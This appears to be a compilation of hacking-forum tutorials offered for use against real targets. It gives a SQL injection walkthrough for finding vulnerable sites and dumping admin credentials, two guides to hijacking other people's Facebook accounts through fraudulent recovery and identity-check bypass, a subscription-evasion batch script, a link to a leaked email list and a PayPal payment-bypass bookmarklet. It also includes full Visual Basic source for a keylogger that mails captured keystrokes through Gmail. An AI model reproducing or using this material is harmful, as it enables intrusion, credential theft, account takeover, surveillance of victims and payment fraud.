How to Hack Using SQL Injection (Very Easy)

What exactly is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)

What will I need to perform an SQL Injection attack?

[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder
[+] half a brain and the will to learn lol

I have provided all but 2 (in a .rar package available for download below) of the stated things above that you need. Also provided is a virus scan of the .rar for the skeptics lol

CLICK HERE TO DOWNLOAD THE TOOLS

Yes I know its 2/41. Its the exploit scanner. Its dectected as a Exploits/Riskware scanner. I myself use this same tool and no I'm not infected.

Spoiler (Click to Hide)

Code:

Antivirus      Version      Last Update      Result
a-squared    4.5.0.50    2010.01.18    -
AhnLab-V3    5.0.0.2    2010.01.18    -
AntiVir    7.9.1.142    2010.01.18    SPR/Tool.ExpScan
Antiy-AVL    2.0.3.7    2010.01.18    -
Authentium    5.2.0.5    2010.01.18    -
Avast    4.8.1351.0    2010.01.18    -
AVG    9.0.0.730    2010.01.18    -
BitDefender    7.2    2010.01.18    -
CAT-QuickHeal    10.00    2010.01.18    -
ClamAV    0.94.1    2010.01.18    -
Comodo    3625    2010.01.18    -
DrWeb    5.0.1.12222    2010.01.18    -
eSafe    7.0.17.0    2010.01.17    -
eTrust-Vet    35.2.7243    2010.01.18    -
F-Prot    4.5.1.85    2010.01.17    -
F-Secure    9.0.15370.0    2010.01.18    -
Fortinet    4.0.14.0    2010.01.18    -
GData    19    2010.01.18    -
Ikarus    T3.1.1.80.0    2010.01.18    -
Jiangmin    13.0.900    2010.01.18    -
K7AntiVirus    7.10.949    2010.01.16    -
Kaspersky    7.0.0.125    2010.01.18    -
McAfee    5864    2010.01.17    -
McAfee+Artemis    5864    2010.01.17    -
McAfee-GW-Edition    6.8.5    2010.01.18    Riskware.Tool.ExpScan
Microsoft    1.5302    2010.01.18    -
NOD32    4783    2010.01.18    -
Norman    6.04.03    2010.01.18    -
nProtect    2009.1.8.0    2010.01.18    -
Panda    10.0.2.2    2010.01.17    -
PCTools    7.0.3.5    2010.01.18    -
Prevx    3.0    2010.01.18    -
Rising    22.31.00.04    2010.01.18    -
Sophos    4.49.0    2010.01.18    -
Sunbelt    3.2.1858.2    2010.01.17    -
Symantec    20091.2.0.41    2010.01.18    -
TheHacker    6.5.0.6.154    2010.01.18    -
TrendMicro    9.120.0.1004    2010.01.18    -
VBA32    3.12.12.1    2010.01.17    -
ViRobot    2010.1.18.2142    2010.01.18    -
VirusBuster    5.0.21.0    2010.01.18    -

Ok after you are done downloading the tools. Open the .rar located on your desktop. Now open the .txt called "dorks'. From this list you can pick any dork you feel like scanning with. For good search results search for a dork like this.

Code:

index.php?id=

After you have chose a dork like above, copy it into your clipboard for further use. Now open your exploit scanner.exe. (scanner made by reiluke). At the top where it says "Dork" your going to want to paste your dork into the box. It should look something like this.

Spoiler (Click to Hide)

Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists and it should look like this.

Spoiler (Click to Hide)

After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example.

Code:

sqlivulnerablesite.com/index.php?id=1'

*NOTE* With this exploit scanner it auto-quotes all the urls.

Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.

Code:

sqlivulnerablesite.com/index.php?id=1 order by 1--

Load the page. If the page loads correctly with that code injection in the url then we are on the right track

Knowing that there is already 1 column in this database we do another code injection. Like this.

Code:

sqlivulnerablesite.com/index.php?id=1 order by 2--

If the page loads correctly again then this attack can still be performed.

Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10.

*NOTE* If you load the web page on a code injection like this.

Code:

sqlivulnerablesite.com/index.php?id=1 order by 10--

and you get a result like this.

Code:

Unknown column '10' in 'order clause'

Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.

Code:

sqlivulnerablesite.com/index.php?id=1 order by 9--

If your page loads correctly then this means there is 9 columns in the database

The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--

After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9

When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--

*NOTE* Here (x) is the ascii value of the table name.

Now we must find the ascii value of the word admins.

GO HERE TO CONVERT TEXT TO ASCII

The ascii value of admins is

Code:

& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;

Delete all the ";" , "#" , and "&". So it should look like this.

Code:

97,100,109,105,110,115

Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--

When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.

Code:

sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --

*NOTE* (0x3a) is the ascii value of the column name

When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise.

Another Way to Hack Facebook Accounts!

First of all, I want to say is this is not hacking, this is called "Reverting".

What is Reverting?

Reverting means undoing the effects of one or more edits, which normally results in the page being restored to a version that existed sometime previously.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk, also you can learn how to get your account back from this.

Ok, let's start:

Step 1: First of all open this link:

http://www.facebook.com/help/contact.php...in_changed

NOTE: Be sure you are not logged in.

Step 2: Your email address.

Simple, write your "own" email adress, or the slave you are hacking.


Step 3: Can you send and receive emails from your login email address?

Choose "No".


Step 4: Has the login email address that you normally use to log in to your account been hacked?

Choose "Yes".


Step 5: Has the login email address on your account been changed?

Choose "Yes" again.


Step 6: Full name on the account.


If you still can't find it, then try using those links:

http://www.pipl.com/email
http://com.lullar.com

or google slave's address.

If you STILL can't find it, use a little SE(Social Engeneering) try adding the slave as friend, and you will be able to see his full name.

Since, I got full name of my slave, that's gonna look like this:

Spoiler (Click to View)

Step 7: Email address(es) that may be affiliated with the account.

Write "No".

http://i45.tinypic.com/zjtt7m.jpg

Step 8: Your contact email address.

Write your email adress where facebook can contact you. Example crazy@gmail.com.


Step 9: Your username (if applicable).

If you have created username, write it there. If you are not sure about your slave, ask him first, if he looks like confused and asking you what's that, then probably he doesn't have one. You can make username by logging your facebook first, going to "Settings" and click "change" on your username. Personally I don't have an username. Many people don't have a username, so write there "none", "don't have" or "no".


Step 10: URL (web address link) to your profile page.

You can find slave's profile page, by searching their email. ogin to your facebook, write their email in the search button and press Enter. After some seconds, it will appear their name, click on it and copy the URL. There are more instruction in the pictures. They look bad but that was the best I could do.


Ok then, write slave's prifle URL, and click the button "Submit".


Step 11: Once you're done and pressed the Submit button a message will appear:
"Thanks, your inquiry has been forwarded to the Facebook Team."

That means, you're done and you have to wait while facebook check up your request and send you email to the email you wrote where they can contact you.

How to Mass Add Friends on FaceBook

Go to your FaceBook account







An email list for trial (20000+ emails >> all Mafia War addicts)
http://www.multiupload.com/T5CUE9ZD1B

Free Movies and TV using Graboid Hack

So if some of you may have heard, Graboid offers free movies, TV shows and more to download. It is subscription based on bandwidth. First, Download the Program HERE

Then after you open the program you will have the option to create and account.

Create it and log in. You will notice your bandwidth restriction, and your account will expire in a month, when you have to buy a subscription.

Once your account has expired. I have discovered a new way to make accounts (NOTE: After your account is created, you will never be able to create a free account again, nor through the program or website).

Make this batch script:

Code:

cd %appdata%
del MozillaControl /F /q
cd “%LOCALAPPDATA%\Graboid_Inc\”
del *.* /F /q

Or download it HERE if you dont know how.

Run the batch file, and behold, the new account button shall appear again. Enter a different email address than previous, and your good to go.

FOR THOSE WITH ISSUES CREATING ACCOUNTS:

1. Renew your IP address (unplug your modem for about 5mins and then reconnect it).

2. If the problem is not solved by number 2, download Hotspot Shield HERE

3. If it still doesn't work, wait a week. This will give a chance for your ISP to reset your IP. If it doesn't work then, PM me and I'll make you an account.

Hope this helped!

Full DL links:

Graboid Setup:

http://www.mediafire.com/download.php?timmwdjendk

Batch script:

Code:

http://www.mediafire.com/download.php?ikm3yzuw01m

How to Make Your Own Keylogger!

1. STEP

Download Visual Basic Express Edition 2008 for free if you didnt already.

2. STEP

• Run Visual Basic
• In Tab click File > New Project
• Windows Application > "Keylogger Builder" > Click Ok
  

3. STEP

Change the following from the Properties of Form1:

FormBorderStyle = FixedSingle
MaximizeBox = False
MinimizeBox = False
Show Icon = False
StartPosition = CenterScreen
Text = Keylogger Builder



From the Toolbox add:

• TextBox1 - The GMail Username textbox
• Textbox2 - The Gmail Password textbox
• Button1 - The Build button, Change text to: Build
• Label1 - Change text to: Gmail Username
• Label2 - Change text to: Gmail Password
  

4. STEP

Now when you add all these, on top of code add:

Code:

Imports System.IO

Now under Public Class Form1 add following code, that would be strings:

Code:

Dim stub, text1, text2 As String
    Const FileSplit = "@keylogger@"

Now when you done with that, just simply double click Button1 and add:

Code:

text1 = TextBox1.Text
        text2 = TextBox2.Text
        FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(1))
        FileGet(1, stub)
        FileClose(1)
        If File.Exists("Server.exe") Then
            My.Computer.FileSystem.DeleteFile("Server.exe")
        End If
        FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(1, stub & FileSplit & text1 & FileSplit & text2 & FileSplit)
        FileClose(1)
        MsgBox("The Server.exe is builded!")

Now you got your builder and now lets move to Stub.

5. STEP

• Run Visual Basic
• In Tab click File > New Project
• Windows Application > "Stub" > Click Ok
  

6. STEP

Change the following from the Properties of Form1:

FormBorderStyle = FixedToolWindow
StartPosition = CenterScreen
Text = (no text)
WindowsState = Minimized


From the Toolbox add:

• Textbox1 - KEY LOGGER(follow everything what slave write)
• Textbox2 - GMail Username
• Textbox3 - GMail Password
• Timer1 - Upload Interval
• Timer2 - Get name of window where keylogger get
  keys(userful)
• Timer3 - Get Key

Timer1 Interval = 900000
Timer2 Interval = 100
Timer3 Interval = 100

7. STEP

Now when you add all these, on top of code add:

Code:

Imports System.IO
Imports System.Net.Mail

Now under Public Class Form1 add following code, that would be strings:

Code:

Dim options(), text1, text2 As String
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim result As Integer
    Const FileSplit = "@keylogger@"

Now double click Timer1 and write following code:

Code:

Dim MailSetup As New MailMessage
        MailSetup.Subject = My.Computer.Name & ":"
        MailSetup.To.Add(TextBox2.Text)
        MailSetup.From = New MailAddress(TextBox2.Text)
        MailSetup.Body = TextBox1.Text
        Dim SMTP As New SmtpClient("smtp.gmail.com")
        SMTP.Port = 587
        SMTP.EnableSsl = True
        SMTP.Credentials = New Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
        SMTP.Send(MailSetup)
        TextBox1.Clear()

And add this as Function to source code:

DOWNLOAD HOW TO ADD FUNCTION IF YOU DONT KNOW:

http://www.mediafire.com/?hyr22ivdg2m

Code:

Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
    Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
    Dim strin As String = Nothing

    Private Function GetActiveWindowTitle() As String
        Dim MyStr As String
        MyStr = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, MyStr, 100)
        MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
        Return MyStr
    End Function

Now double click Timer2 to get names of active windows:

Code:

If strin <> GetActiveWindowTitle() Then
            TextBox1.Text = TextBox1.Text + vbNewLine & "[" & GetActiveWindowTitle() & "]:" + vbNewLine
            strin = GetActiveWindowTitle()
        End If

Now double click Form1 and write following code:

Code:

FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        text1 = Space(LOF(1))
        text2 = Space(LOF(1))
        FileGet(1, text1)
        FileGet(1, text2)
        FileClose(1)
        options = Split(text1, FileSplit)
        TextBox2.Text = options(1)
        TextBox3.Text = options(2)
        Timer1.Start()
        Timer2.Start()

Now double click Timer3 and past code:

Code:

For i = 1 To 255
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                TextBox1.Text = TextBox1.Text + Chr(i)
            End If
        Next i

8. STEP

You are done!

Finnaly you made your own, keylogger ... enjoy and for more informations and error reaports please PM or post here, I'll fix it :)


Download Project:
http://www.mediafire.com/?izztizynwjz

How to Hack Facebook!

Social Engineering

-Ah, the classic stories of "My friend hacked my facebook" or "How can I hack my friend?" or my personal favorite "How to hack my girlfriend's Facebook?"

A common mistake by layman who do not know much about the internet is giving information out without actually knowing that they are giving the information out.

Social Engineering on Facebook seems like a joke considering that you aren't going to ask the person their password and e-mail for you to log in. Even if they do in fact give you their information voluntarily, it's pointless.

Why is it pointless? Well, Facebook has become smarter on their security.


Basically, it comes down to this.

Facebook will detect 'Suspicion' on the account that you are logging in and it will not allow you to log in under that account simply because their logs of the original account owner do not match with your IP or the IP your are hidden behind.

1) Suspicion

2) Security question

3) Confirm Identity

4) Confirm identity by identifying the friends on that account.

Now to retrieve back to the very beginning of this tutorial, I said that Key logging, Phishing, Social Engineering, and RATs were the common methods associated with hacking a Facebook account.

I will respectfully correct my mistake and as well as the other tutorials on here.

1) Even if you do manage to steal the password and e-mail using Keylogs, the problem of suspicion will appear.

2) Even if you do manage to steal the password and e-mail using Phishing, the problem of suspicion will appear.

3) Even if you do manage to crack the password out of your target through Social Engineering, the problem of suspicion will appear.

4) RATs are probably and definitely the best way to go into "hacking" a Facebook account simply because you will have full access to their computers. You can change their info through computers and the problem of suspicion will not appear.

RATs are NOT the only possible way to get in! Keylogging, Phishing, and Social Engineering might work as well.

I believe that Facebook compares the ranges of IP based on the ISP of the target. Now, if that's the case...Simply do a whois on the slave using the RAT.

If you do not know what whois is, it's basically a query that searches where the target is located. Normally you can double click on the slave when they are online on the RAT and see where they are from and look at their IP.

Now, you don't really need a RAT to tell you where the slave lives or his IP. If you already have his IP or location through other methods such as reverting you're good to go.

However, if you do not have any information at all what so ever, you can try searching on these sites to revert info about the target.

http://com.lullar.com/

http://www.pipl.com/email/

http://www.spokeo.com

http://www.emailfinder.com

http://www.zabasearch.com/

http://www.zoominfo.com

Now, once you have an IP or ISP, or location the next part is looking for a Sock5 to hide behind so Facebook thinks that you are only using a different computer in the same area. You can also spoof the IP, but I will not go into that.

So, after all that work, you still can't take over their accounts?

Matching Faces

I thought about this method as I was showing a friend through Teamviewer the pictures that Facebook was showing me to identify the target's friends. And obviously, I was clueless because I did not know of the people.

What did I do? Well, as you can see the picture #4:

1) Suspicion

2) Security question

3) Confirm Identity

4) Confirm identity by identifying the friends on that account.



Facebook provides the names of the target's friends. So, use that information to essentially bypass the security of identification by searching those names on Facebook search and matching the faces based on the Target's friends.

It will only ask you match faces if you are logging in with the correct password or if you get picked up from a different location.

Note that will need an extra Facebook account to search, otherwise Facebook does not let you search. Close the 'Suspicion' page and log in to your extra or your actual Facebook account and search for the Target's friends.

Be sure to notice where your target lives so on the results you can compare whether if the friend is the matching face or not. Be sure to notice the names of the friends as well.

For example, if the name choices are:
George Bush
Adolf Hitler
Barrack Obama
Mohammed Ali
Lee Chang

And the picture given is of an middle eastern descent looking person, you should obviously go with the name that sounds middle eastern.

Once you match the faces for the identification questions. You should be able to get in without a problem.

To wrap it up,

I will warn you one one important thing, if you do not have access to their e-mails. They will get an e-mail notifying that someone is trying to log in on their accounts and your IP will be shown to them.

So, what that means is to always hide behind a VPN or a proxy so you can't be traced back.

Try to take over their e-mails if you want or simply delete the notification e-mails so they do not notice.

Taking over the e-mail will be an obvious sign that they got hacked and they might try to retrieve the e-mail password, so be sure to change the e-mail password and security questions immediately so they cannot get it back. Only take over the e-mail once you have completely stolen and gained access to the Facebook account because they can easily change the e-mail on the Facebook account and you'll be screwed.

6) Regaining access

[b]This is a new section on the tutorial which I decided to include since it's important to know if accidents were to happen.

1) Person updates their security

2) Person continues updating security

3)
Person finishes security

So, what this means is that you will be left out of their account if they update their security information and you will have to bypass all the security measures all over again.

This is what you will see:
1)This is what will show telling you "You used an old password"

This picture shows that you have logged in with their old password, and will ask to confirm that it's in fact you.

2)The options to using old password.

This will give you the options of how you confirm that it's in fact you.

3)Identify your account (Note that you are the one who has to identify yet again)

I chose to confirm using profile URL. There are a variety to choose from.

4) Linking to profile

I linked it here.
5)
Applying CATCHA security

Fill out CAPTCHA.

6) My account has been hacked and I have access to my login e-mail
Confirm My Account

This is the page where you could retrieve Facebook into sending you the new password to their e-mail (If you have access) or even perhaps a different e-mail. Make your story sound as believable as possible, so don't type like you are 10 years old.

Bypass Paypal to get things for Free!

Just add the following to a bookmark, or copy/paste it into your address bar.

Code:

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you visit a page using a paypal button, just click the bookmark or paste the code in the URL bar of your navigator.

If it works, you will be redirected to the download page
Else, try another site (or buy it )

It works with :
Chrome [X]
Firefox [X]
IE [?] (anyone can test it?)
Opera [X]
Safari [X]

A link the script works on : http://www.ptcexpert.com
If you find another link, please share